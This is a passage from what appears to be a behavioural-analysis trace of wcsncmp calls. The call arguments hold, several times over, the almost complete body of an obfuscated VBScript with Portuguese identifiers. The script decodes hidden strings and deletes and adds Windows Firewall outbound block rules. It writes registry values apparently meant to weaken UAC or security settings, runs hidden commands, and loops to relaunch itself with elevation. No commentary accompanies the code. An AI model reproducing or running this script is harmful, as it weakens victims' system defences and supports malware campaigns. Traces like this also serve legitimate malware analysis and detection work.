_String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0226.292] wcsncmp (_String1=", sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.292] wcsncmp (_String1=" sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.292] wcsncmp (_String1="sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.293] wcsncmp (_String1="r\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.293] wcsncmp (_String1="\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd 